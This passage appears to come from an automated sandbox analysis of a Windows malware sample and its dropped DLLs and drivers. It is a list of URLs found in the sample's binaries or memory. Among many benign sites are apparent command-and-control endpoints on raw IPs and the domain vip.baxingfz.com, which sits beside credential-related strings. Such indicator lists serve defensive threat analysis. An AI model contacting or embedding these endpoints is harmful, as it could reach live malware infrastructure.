          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://1066951243755853.cn-hongkong.fc.aliyuncs.com/2016-08-15/proxy/time.LATEST/time/http://time-ti
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://1066951243755853.cn-huhehaote.fc.aliyuncs.com/2016-08-15/proxy/time.LATEST/time/
          Source: DC1FFAF.exe, 00000002.00000002.4748506643.000000001173E000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4769812740.0000000013F88000.00000004.00000020.00020000.00000000.sdmp, 42EEXUWWZ.dll.2.dr, 1F0xyrmp.dll.2.drString found in binary or memory: http://115.28.91.235/api/fun.aspx
          Source: DC1FFAF.exe, 00000002.00000002.4769812740.0000000013F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://115.28.91.235/api/fun.aspxname3j
          Source: DC1FFAF.exe, 00000002.00000002.4748506643.000000001173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://115.28.91.235/api/fun.aspxnameo
          Source: 42EEXUWWZ.dll.2.dr, 1F0xyrmp.dll.2.drString found in binary or memory: http://115.28.91.235/api/fun.aspxnamexy
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://115.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://119.29.29.29/d?dn=
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://121.40.137.186/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://121.40.137.186/http://aq.cqyanzheng.com/http://yanzheng.appchizi.com/http://121.40.137.186/ht
          Source: 7488JGDAA.exe.2.drString found in binary or memory: http://123.60.141.182/api/soft.aspx
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://182.254.116.116/d?dn=
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://223.5.5.5/resolve?name=
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://223.6.6.6/resolve?name=
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://588ku.com/
          Source: DC1FFAF.exe, 00000002.00000002.4598653237.0000000000547000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://8.218.87.7/
          Source: DC1FFAF.exe, 00000002.00000002.4598653237.0000000000547000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://8.218.87.7/http://8.218.87.7/8.218.87.7
          Source: DC1FFAF.exe, 00000002.00000002.4718677174.000000001054F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.218.87.7/kss_io/io.php?v=13&bF
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://aq.cqyanzheng.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://beijingcs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://ca800.com/
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://cli.im/
          Source: DC1FFAF.exe, 00000002.00000003.2994885778.0000000012310000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2995238975.000000001230E000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.sys.2.dr, BC66DPQaf.sys.2.drString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
          Source: svchost.exe, 00000004.00000002.3819673759.000001BC6A00F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
          Source: 2865ivSJ0.sys.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
          Source: DC1FFAF.exe, 00000002.00000002.4758545127.0000000012300000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2994885778.0000000012310000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.sys.2.dr, BC66DPQaf.sys.2.drString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
          Source: DC1FFAF.exe, 00000002.00000002.4769260117.0000000013F66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/docs/http-cook
          Source: DC1FFAF.exe, 00000002.00000002.4748506643.000000001173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/docs/http-cookV
          Source: 42EEXUWWZ.dll.2.dr, 7488JGDAA.exe.2.dr, 1F0xyrmp.dll.2.drString found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://dcloud.net.cn/
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://dt1.hyocr.com:8080
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://dt1.hyocr.com:8080http://dt2.hyocr.com:8080
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://dt2.hyocr.com:8080
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: qmgr.db.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://foodmate.net/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://guangzhoucs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://heyuancs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://huadongcs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://huanancs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://huhehaotecs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://iliangcang.com/
          Source: DC1FFAF.exe, 00000002.00000003.2195942618.0000000006540000.00000004.00000020.00020000.00000000.sdmp, 9605A212x.dll.2.drString found in binary or memory: http://ip.qq.com/
          Source: DC1FFAF.exe, 00000002.00000003.2195942618.0000000006540000.00000004.00000020.00020000.00000000.sdmp, 9605A212x.dll.2.drString found in binary or memory: http://ip.qq.com/v1-dll-api.jsdama.com
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://iwencai.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://lusongsong.com/
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://ocsp.digicert.com0I
          Source: DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://ocsp.digicert.com0P
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2815951601.0000000012310000.00000004.00000020.00020000.00000000.sdmp, 2865ivSJ0.sys.2.drString found in binary or memory: http://ocsp.digicert.com0R
          Source: DC1FFAF.exe, 00000002.00000002.4758545127.0000000012300000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2994885778.0000000012310000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2995238975.000000001230E000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.sys.2.dr, BC66DPQaf.sys.2.drString found in binary or memory: http://ocsp.thawte.com0
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%d
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%d&user=%s
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://plugin.config.hyocr.com:8080/hyver.php?ver=%dhttp://plugin.config.hyocr.com:8080/hyver.php?ve
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php
          Source: 712EVTPSM.dll.2.drString found in binary or memory: http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.phpupl
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://qingdaocs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://shanghaics.oss-accelerate.aliyuncs.com/
          Source: DC1FFAF.exe, 00000002.00000003.2402987601.0000000006543000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4680189506.0000000006543000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4680189506.0000000006517000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinacloud.net/operate/
          Source: DC1FFAF.exe, 00000002.00000002.4679992769.000000000647A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sinacloud.net/operate/tj
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://soso.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-bzyrqxranf.cn-shenzhen.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-dbvpvdlnog.cn-chengdu.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-nupgrajznn.cn-shanghai.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-wgfgnkosmo.cn-qingdao.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-wivqmpesvz.cn-zhangjiakou.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-time-xbdcaygxjb.cn-beijing.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://time-timeget-bkjjdrkcip.cn-hangzhou.fcapp.run
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://tower.im/
          Source: DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com
          Source: DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2240906144.000000000778A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/
          Source: DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/)
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/...
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/.e
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/.l
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com//
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.000000000778A000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2240906144.000000000778A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/4PC
          Source: DC1FFAF.exe, 00000002.00000002.4683117572.000000000711C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/AR
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/C:
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/Kr
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/Ks
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/http://baxing.1Rememberaccountusernameconfigpasswordclientidrandomstrwebdata
          Source: DC1FFAF.exe, 00000002.00000002.4694082518.000000000D9C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/http://vip.baxingfz.com/
          Source: DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.0000000007746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/i
          Source: DC1FFAF.exe, 00000002.00000002.4686679559.00000000076D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/lll
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/vam
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003EB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/x9
          Source: DC1FFAF.exe, 00000002.00000003.2241872766.0000000007746000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.0000000007746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vip.baxingfz.com/y
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://w7000.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://wallstreetcn.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://wulancabucs.oss-accelerate.aliyuncs.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.10jqka.com.cn/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.1688.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.17173.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.18183.com/
          Source: 1.exe, 00000000.00000002.2157210921.0000000000807000.00000002.00000001.01000000.00000003.sdmp, DC1FFAF.exe, 00000002.00000002.4598202187.00000000004F7000.00000002.00000400.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: http://www.21food.cn/
